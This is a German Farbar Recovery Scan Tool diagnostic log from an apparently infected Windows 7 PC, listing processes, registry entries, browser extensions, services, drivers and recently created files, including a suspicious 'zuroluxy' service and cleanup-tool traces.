Geladene Profile: Kenny G & UpdatusUser &  (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium)
Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 8 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
() C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs
(CyberGhost S.R.L) C:\Program Files\CyberGhost 5\Service.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Malwarebytes Corporation) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbam.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Nvtmru] => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe [1028384 2013-10-18] (NVIDIA Corporation)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3775912 2015-08-24] (AVG Technologies CZ, s.r.o.)
HKLM Group Policy restriction on software: C:\Program Files\BitDefender <====== ACHTUNG
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd)
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd)
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_13_0_0_214_Plugin.exe -update plugin
HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {56afb9cd-5a71-11e3-957d-001e8c09ea3d} - F:\iStudio.exe
HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {56afb9cd-5a71-11e3-957d-001e8c09ea3d} - F:\iStudio.exe
SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation)
SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon1] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon2] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon3] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon4] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\System32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\SysWow64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
GroupPolicyUsers\S-1-5-21-682121585-3582832733-1082443493-1008\User: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{3B1D22AF-F97D-45ED-B09F-5CAD2B93F90B}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-682121585-3582832733-1082443493-1007\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-682121585-3582832733-1082443493-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp
HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {EAE34A3D-27B1-4773-A9EC-88E5068C2C50} URL = hxxps://www.google.com/search?q={searchTerms}
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Keine Datei
Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Keine Datei
Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Keine Datei
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-11] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-11] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2013-10-01] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-10-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-10-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-09-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Extension: Cliqz - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\cliqz@cliqz.com.xpi [2014-11-08]
FF Extension: Adblock Plus - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-03-22]
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF HKLM-x32\...\Firefox\Extensions: [ffpwdman@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender\Antispam32\ffpwdman
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com
FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com

Chrome: 
=======
CHR StartupUrls: Profile 2 -> "hxxps://www.google.de/"
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-16]
CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-16]
CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-16]
CHR Extension: (Bitdefender Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-02-16]
CHR Extension: (Google Search) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-16]
CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-16]
CHR Extension: (Gmail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-16]
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-15]
CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-06-26]
CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-26]
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2
CHR Extension: (Google Präsentationen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-10-03]
CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-03]
CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-03]
CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-03]
CHR Extension: (Google-Suche) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-03]
CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2015-07-27]
CHR Extension: (Google Tabellen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-10-03]
CHR Extension: (Google Text & Tabellen Offline) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-18]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-26]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-03]
CHR Extension: (Google Mail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-03]
CHR HKLM-x32\...\Chrome\Extension: [ccahoghmggldkcdjiebjkidpfongdfbl] - <kein Path/update_url>

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 avgfws; C:\Program Files (x86)\AVG\AVG2015\avgfws.exe [1560592 2015-08-24] (AVG Technologies CZ, s.r.o.)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3637160 2015-08-24] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [335656 2015-08-24] (AVG Technologies CZ, s.r.o.)
R2 CGVPNCliService; C:\Program Files\CyberGhost 5\Service.exe [63968 2015-05-21] (CyberGhost S.R.L)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15122208 2013-10-18] (NVIDIA Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-01-15] ()
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)
R2 WtuSystemSupport; C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [1205136 2015-08-26] ()
S2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [X]
S2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [X]
R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [162784 2015-03-11] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [77760 2015-07-09] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [313264 2015-08-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [297904 2015-08-19] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [259040 2015-06-16] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [378336 2015-05-07] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [250800 2015-08-04] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [40928 2015-03-20] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [300464 2015-08-04] (AVG Technologies CZ, s.r.o.)
R1 cbfs3; C:\Windows\system32\drivers\cbfs3.sys [352144 2012-04-09] (EldoS Corporation)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-09-19] (Disc Soft Ltd)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [113880 2015-09-23] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [8192 2005-03-29] ()
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-09-28] (NVIDIA Corporation)
R0 SI3132; C:\Windows\System32\DRIVERS\SI3132.sys [90664 2007-10-03] (Silicon Image, Inc)
R0 SiFilter; C:\Windows\System32\DRIVERS\SiWinAcc.sys [22056 2007-10-03] (Silicon Image, Inc)
R0 SiRemFil; C:\Windows\System32\DRIVERS\SiRemFil.sys [17448 2007-10-03] (Silicon Image, Inc)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-09-23 04:59 - 2015-09-23 04:59 - 00000000 ____D C:\Users\Kenny G\Downloads\FRST-OlderVersion
2015-09-23 04:58 - 2015-09-23 04:58 - 00068936 _____ C:\Users\Kenny G\AppData\Local\GDIPFONTCACHEV1.DAT
2015-09-22 06:36 - 2015-09-22 06:36 - 00001583 _____ C:\Users\Kenny G\Desktop\neu.txt
2015-09-21 18:38 - 2015-09-21 18:38 - 00028509 _____ C:\ComboFix.txt
2015-09-21 18:13 - 2011-06-26 08:45 - 00256000 _____ C:\Windows\PEV.exe
2015-09-21 18:13 - 2010-11-07 19:20 - 00208896 _____ C:\Windows\MBR.exe
2015-09-21 18:13 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-09-21 18:13 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-09-21 18:13 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-09-21 18:13 - 2000-08-31 02:00 - 00098816 _____ C:\Windows\sed.exe
2015-09-21 18:13 - 2000-08-31 02:00 - 00080412 _____ C:\Windows\grep.exe
2015-09-21 18:13 - 2000-08-31 02:00 - 00068096 _____ C:\Windows\zip.exe
2015-09-21 18:12 - 2015-09-21 18:38 - 00000000 ____D C:\Qoobox
2015-09-21 18:12 - 2015-09-21 18:36 - 00000000 ____D C:\Windows\erdnt
2015-09-21 18:10 - 2015-09-21 18:10 - 05635484 ____R (Swearware) C:\Users\Kenny G\Downloads\ComboFix.exe
2015-09-20 19:56 - 2015-09-20 19:56 - 00000000 _____ C:\Users\Kenny G\Desktop\Neues Textdokument.txt
2015-09-20 19:46 - 2015-09-20 19:46 - 00040674 _____ C:\Users\Kenny G\Desktop\AVG log.csv
2015-09-20 19:42 - 2015-09-20 19:35 - 00058541 _____ C:\Users\Kenny G\Desktop\FRST.txt
2015-09-20 19:42 - 2015-09-20 19:35 - 00044699 _____ C:\Users\Kenny G\Desktop\Addition.txt
2015-09-20 19:42 - 2015-09-20 18:20 - 00054932 _____ C:\Users\Kenny G\Desktop\mbam-log-2015-09-20 (17-46-10).xml
2015-09-20 19:29 - 2015-09-20 19:30 - 00032570 _____ C:\Users\Kenny G\Desktop\GMER.txt
2015-09-20 19:19 - 2015-09-20 19:19 - 00380416 _____ C:\Users\Kenny G\Downloads\Gmer-19357.exe
2015-09-20 19:17 - 2015-09-20 19:35 - 00044699 _____ C:\Users\Kenny G\Downloads\Addition.txt
2015-09-20 19:16 - 2015-09-23 04:59 - 00022927 _____ C:\Users\Kenny G\Downloads\FRST.txt
2015-09-20 19:15 - 2015-09-23 04:59 - 00000000 ____D C:\FRST
2015-09-20 19:14 - 2015-09-23 04:59 - 02192384 _____ (Farbar) C:\Users\Kenny G\Downloads\FRST64.exe
2015-09-20 19:14 - 2015-09-20 19:14 - 00000476 _____ C:\Users\Kenny G\Downloads\defogger_disable.log
2015-09-20 19:14 - 2015-09-20 19:14 - 00000000 _____ C:\Users\Kenny G\defogger_reenable
